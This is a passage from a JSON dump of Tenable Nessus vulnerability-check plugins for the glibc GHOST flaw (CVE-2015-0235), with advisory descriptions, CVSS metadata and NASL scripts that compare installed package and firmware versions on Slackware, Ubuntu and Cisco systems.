pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-i18n\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-profile\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-solibs\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-i18n\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-profile\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-solibs\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"glibc\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-i18n\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-profile\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-solibs\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:22", "description": "According to its self-reported version number, the Cisco TelePresence Video Communication Server is affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validating user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2015-02-18T00:00:00", "type": "nessus", "title": "Cisco TelePresence Video Communication Server GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_video_communication_server_software", "cpe:/a:cisco:telepresence_video_communication_server", "cpe:/h:cisco:telepresence_video_communication_server"], "id": "CISCO_TELEPRESENCE_VCS_CSCUS69558.NASL", "href": "https://www.tenable.com/plugins/nessus/81408", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81408);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69558\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco TelePresence Video Communication Server GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Cisco TelePresence Video Communication Server installed\non the remote host is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cisco TelePresence\nVideo Communication Server is affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidating user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69558\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.2 / 8.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server_software\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_telepresence_video_communication_server_detect.nbin\");\n script_require_keys(\"Cisco/TelePresence_VCS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Video Communication Server\";\nversion = get_kb_item_or_exit(\"Cisco/TelePresence_VCS/Version\");\n\nif (\n version =~ \"^[67]\\.\" ||\n version =~ \"^8\\.[0-1]\\.\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 8.2 / 8.5' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:02", "description": "It was discovered that a buffer overflow existed in the gethostbyname and gethostbyname2 functions in the GNU C Library. An attacker could use this issue to execute arbitrary code or cause an application crash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS : eglibc vulnerability (USN-2485-1) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libc6", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2485-1.NASL", "href": "https://www.tenable.com/plugins/nessus/81042", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2485-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81042);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"USN\", value:\"2485-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS : eglibc vulnerability (USN-2485-1) (GHOST)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a buffer overflow existed in the gethostbyname\nand gethostbyname2 functions in the GNU C Library. An attacker could\nuse this issue to execute arbitrary code or cause an application\ncrash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2485-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected libc6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6\", pkgver:\"2.11.1-0ubuntu7.20\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libc6\", pkgver:\"2.15-0ubuntu10.10\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libc6\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:50:50", "description": "The remote Cisco device is running a version of Cisco IOS XE software that is affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validated user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\nNote that only the following devices are listed as affected :\n\n - Cisco ASR 1000 Series Aggregation Services Routers\n - Cisco ASR 920 Series Aggregation Services Routers\n - Cisco ASR 900 Series Aggregation Services Routers\n - Cisco 4400 Series Integrated Services Routers\n - Cisco 4300 Series Integrated Services Routers\n - Cisco Cloud Services Router 1000V Series", "cvss3": {}, "published": "2015-03-02T00:00:00", "type": "nessus", "title": "Cisco IOS XE GNU C Library (glibc) Buffer Overflow (CSCus69732) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/o:cisco:ios_xe"], "id": "CISCO-SA-20150128-GHOST-IOSXE_MULTI.NASL", "href": "https://www.tenable.com/plugins/nessus/81594", "sourceData": "#TRUSTED 510c7fbe9816d2d0c4bd28014c99f98c2c3c652755bdecb3c8e54563635712efb3d2cdb840055785e61f805eb0d2a62f3726ab54ca81843fd44a7249dbab64ae165a06a8fe178a01256963d281cf715987005dba742f8c5127fc8d1c617765362d1681e306ef9ca3e9be42952c5eba6c5bc25eede700ce0c336acbc2f761419f778221dd6c96635e7a364ba379cf36de3e57a2e06c56252b888e3131d7c2f050dc1521aae167c755efef18e71796b19c703d42731d65c20ec6afa77442576511ddac67a8cf6ead79cf1f450d7ada2c8296e1a6d113c5409382850e5e394a7e713e3caf5223887d0c6371c0e103c3c4059d91d1de2d757678daa69e6cf4a64d7f25b3a01a0c8a4ab7a7241f779cd3d135ba7283b688a7e97b3872a8a2f53256e0cad19055959e2a52363b6d2ad74a1cba8d24950ed9f17863e11939481194d5a53c55a270a5676770eb508e44c35e9ba5d7500dc6a662e0a116e565b1113ff80fa8a16ad8aa7fba421df14198cf6801eec0286794e8949c4b6a00697473ba9ed942e06901d51dd2d0df160e4f191ed02aec67acfbd5ccdfe10aee02395a918f9b05f20146876d05b79ae55e8f82728ca61c58747240650e83fa55068ff2403324ec06771b9aa10deff522c2e0c6f3b88cb095206b9332dbeacfefb62827dc6638e7b8da2a2cdb446c205372ea7c41aebe5279403e3641547cc078a07d299074c7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81594);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69732\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco IOS XE GNU C Library (glibc) Buffer Overflow (CSCus69732) (GHOST)\");\n script_summary(english:\"Checks IOS XE version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco device is running a version of Cisco IOS XE software\nthat is affected by a heap-based buffer overflow vulnerability in the\nGNU C Library (glibc) due to improperly validated user-supplied input\nto the __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2() functions. This allows a remote attacker to cause a\nbuffer overflow, resulting in a denial of service condition or the\nexecution of arbitrary code.\n\nNote that only the following devices are listed as affected :\n\n - Cisco ASR 1000 Series Aggregation Services Routers\n - Cisco ASR 920 Series Aggregation Services Routers\n - Cisco ASR 900 Series Aggregation Services Routers\n - Cisco 4400 Series Integrated Services Routers\n - Cisco 4300 Series Integrated Services Routers\n - Cisco Cloud Services Router 1000V Series\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69732\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco bug ID CSCus69732.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xe\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xe_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XE/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Version\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Model\");\n\n# Model check\n# Per Bug CSCus69732\nif (\n !(\n \"ASR1k\" >< model ||\n \"ASR920\" >< model ||\n \"ASR900\" >< model ||\n \"ISR4400\" >< model ||\n \"ISR4300\" >< model ||\n \"CSR1000V\" >< model\n )\n) audit(AUDIT_HOST_NOT, \"an affected model\");\n\n# Version check\n# Per Bug CSCus69732\n# - top list (raw)\n# - and bottom list (converted)\nif (\n version == \"3.10.0S\" || #bl\n version == \"3.10.4S\" || #bl\n version == \"3.11.0S\" || #bl\n version == \"3.11.2S\" || #bl\n version == \"3.11.3S\" ||\n version == \"3.12.0S\" || #bl\n version == \"3.12.1S\" || #bl\n version == \"3.13.0S\" || #bl\n version == \"3.13.2S\" ||\n version == \"3.14.S\" ||\n version == \"3.4.7S\" ||\n version == \"3.7.0S\" || #bl\n version == \"3.7.6S\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : CSCus69732' +\n '\\n Installed release : ' + version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:51:10", "description": "A vulnerability has been fixed in eglibc, Debian's version of the GNU C library :\n\nCVE-2015-0235\n\nQualys discovered that the gethostbyname and gethostbyname2 functions were subject to a buffer overflow if provided with a crafted IP address argument. This could be used by an attacker to execute arbitrary code in processes which called the affected functions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nWe recommend that you upgrade your eglibc packages.\n\nThe other three CVEs fixed in Debian wheezy via DSA 3142-1 have already been fixed in squeeze LTS via DLA DLA 97-1.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-139-1 : eglibc security update (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], 